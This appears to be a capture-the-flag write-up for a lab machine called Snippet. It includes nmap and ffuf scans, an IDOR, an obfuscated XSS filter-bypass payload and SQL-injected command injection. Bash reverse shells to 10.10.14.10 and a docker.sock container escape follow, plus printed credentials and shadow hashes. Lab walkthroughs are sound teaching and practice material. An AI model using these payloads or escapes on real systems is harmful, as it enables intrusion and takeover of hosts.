Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV -Pn 10.10.11.171
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 14:17 CST
Nmap scan report for 10.10.11.171
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8221e2a5824ddf3f99db3ed9b3265286 (RSA)
| 256 913ab2922b637d91f1582b1b54f9703c (ECDSA)
|_ 256 6520392ba73b33e5ed49a9acea01bd37 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: snippet.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.77 seconds

80

snippet.htb requires a username and password to log in.

Subdomain scan

After adding the hosts entry, a subdomain scan finds dev and mail:

10.10.11.171 snippet.htb

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u "http://snippet.htb/" -H 'Host: FUZZ.snippet.htb' -fl 30

dev [Status: 200, Size: 12822, Words: 1029, Lines: 250, Duration: 328ms]
mail [Status: 200, Size: 5311, Words: 364, Lines: 97, Duration: 354ms]

dev

A Gitea instance; after registering an account and logging in, several existing valid usernames can be seen:

mail

Roundcube Webmail:

API fuzz

Route information extracted from the main site's source:

curl -s 10.10.11.171 | grep Ziggy | sed 's/    const Ziggy = //' | jq | grep uri | awk '{print $2}' | tr -d '"",'

_ignition/health-check
_ignition/execute-solution
_ignition/share-report
_ignition/scripts/{script}
_ignition/styles/{style}
dashboard
users
snippets
snippets/{id}
snippets/update/{id}
snippets/update/{id}
snippets/delete/{id}
new
management/validate
management/dump
register
login
forgot-password
forgot-password
reset-password/{token}
reset-password
verify-email
verify-email/{id}/{hash}
email/verification-notification
confirm-password
logout

management/dump

Fuzz the parameter name, then its value; this returns the users information, and profile is empty:

Several valid account passwords are cracked:

gia@snippet.htb
juliana@snippet.htb
letha@snippet.htb
fredrick@snippet.htb
ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f:password123

snippet

Log in with any of the valid credentials and view the snippets; only one is viewable. Changing the id shows that the API exists, but there is no permission to view that snippet yet:

Create a snippet of your own, then when updating it keep only public set to true (important: don't overwrite the content as well, otherwise the only way back is a reset) and change the id to 2. The update is applied to another user's snippet without authorization, which makes the snippet with id 2 viewable:

curl -XGET http://dev.snippet.htb/api/v1/users/jean/tokens -H 'accept: application/json' -H 'authorization: basic amVhbjpFSG1mYXIxWTdwcEE5TzVUQUlYblluSnBB'

jean:EHmfar1Y7ppA9O5TAIXnYnJpA

Gitea

jean is a valid Gitea user and can log in to the Gitea instance on dev. Reading the code reveals the XSS filter applied to issues:

str.replace only replaces the first occurrence of a <> tag, so two <> tags bypass it.
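The filter defect described above, modelled as an added example (this is not the Gitea code or the writeup's payload): a non-global replace() strips only the first tag, while encoding every HTML-significant character leaves nothing for the browser to parse as markup. The decoy tag, the probe() handler name and the containsTag check are constructed for the example.

```javascript
// Flawed filter as described: replace() with a non-global pattern rewrites
// only the FIRST <...> tag, so anything after a decoy tag survives untouched.
function naiveStripFirstTag(input) {
  return input.replace(/<[^>]*>/, "");
}

// Fix: encode every HTML-significant character instead of stripping tags,
// so the text is rendered literally no matter how many tags it contains.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(input) {
  return input.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Detection check a reviewer can run over the filter's output:
// does anything that still looks like an HTML tag remain?
function containsTag(s) {
  return /<\/?[a-zA-Z][^>]*>/.test(s);
}

// Constructed issue bodies: a single tag, and a decoy tag followed by the real one.
const SINGLE_TAG = 'hello <img src="x" onerror="probe()">';
const DOUBLE_TAG = 'hello<decoy><img src="x" onerror="probe()">';

for (const body of [SINGLE_TAG, DOUBLE_TAG]) {
  const stripped = naiveStripFirstTag(body);
  console.log("naive :", stripped, "| tag left:", containsTag(stripped));
  const escaped = escapeHtml(body);
  console.log("escape:", escaped, "| tag left:", containsTag(escaped));
}
```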

The settings show that charlie is a collaborator, so charlie can be targeted through an XSS in an issue:

xss

The XSS is therefore used to add our current user jean as a collaborator on charlie's repository, and the backup is taken from charlie's repo:

test<test><img SRC="x" onerror=eval.call`${"eval\x28atob`dmFyIHU9J2h0dHA6Ly9kZXYuc25pcHBldC5odGIvY2hhcmxpZS9iYWNrdXBzL3NldHRpbmdzL2NvbGxhYm9yYXRpb24nO2ZldGNoKHUpLnRoZW4ociA9PiBkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCdtZXRhW25hbWU9Il9jc3JmIl0nKS5jb250ZW50KS50aGVuKHQgPT4gZmV0Y2godSx7bWV0aG9kOidQT1NUJyxoZWFkZXJzOiB7J0NvbnRlbnQtVHlwZSc6J2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZDsnfSwgYm9keTonY29sbGFib3JhdG9yPWplYW4mX2NzcmY9Jyt0fSkudGhlbihkID0+IGZldGNoKCdodHRwOi8vMTAuMTAuMTQuMTAvP2RvbmUnKSkp`\x29"}`>

user flag

The backup contains charlie's SSH private key. Log in with it, then switch to the jean user with the password obtained earlier, which yields the user flag:

charlie_id_rsa


Privilege escalation information

Running pspy reveals the MySQL password:

Reading the code in the user's home directory shows a likely command injection:

Because MySQL runs in Docker and the target has no mysql client, forward the port and then inspect the database:

ssh -i charlie_id_rsa charlie@10.10.11.171 -L 13306:127.0.0.1:3306

use webapp;
update users set user_type='Manager' where email='gia@snippet.htb';

Command injection

Change our existing gia user to a Manager. On the web page, the validate function in the member view is the command injection point identified earlier:

So create a malicious user directly and use the command injection to get a shell inside the container:

insert into users(name,email) values('shell','shell@shell|| bash -c "bash -i >& /dev/tcp/10.10.14.10/4444 0>&1" &');

Docker escape & root flag

The /app directory contains a docker.sock file, so the usual Docker escape applies:

curl -s --unix-socket /app/docker.sock http://localhost/images/json
# output
laravel-app_main:latest

cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.10/4444 0<&1'\\\"\"]"
curl -s -X POST --unix-socket /app/docker.sock -d "{\"Image\":\"laravel-app_main\",\"cmd\":$cmd,\"Binds\":[\"/:/tmp:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create?name=miao_root
curl -s -X POST --unix-socket /app/docker.sock "http://localhost/containers/miao_root/start"

This gives a root shell:

shadow

root:$6$XJ0deONw$c1ag/76NHYRVSxMwMeoYPUDsxZDdjC6sX5KKa.QUHi2mjIwN1NlLyRt3QS3E6JjPknuSSOyIUcTTq2SbIXZle/:19157:0:99999:7:::
jean:$6$2ct8z568$.FX4a9sSYGk0QxQiqfiMFIRu.oGdRvGcFgtOz3Hu9bV2i6/Z.IpWlZxZn5iySUJuq9Rqw6oS8yTSFxbAZ4ede.:19156:0:99999:7:::
charlie:$6$Ai.uOoSz$8QB.fXSM7pS2DDpUNBR3Xr3v3MUqlWdSmwEtOjOaRpH73UxGrcxJ/hPkM7h.MfFHM2gzoyHL0.c7s/glcc0Fu.:18995:0:99999:7:::

root_id_rsa


References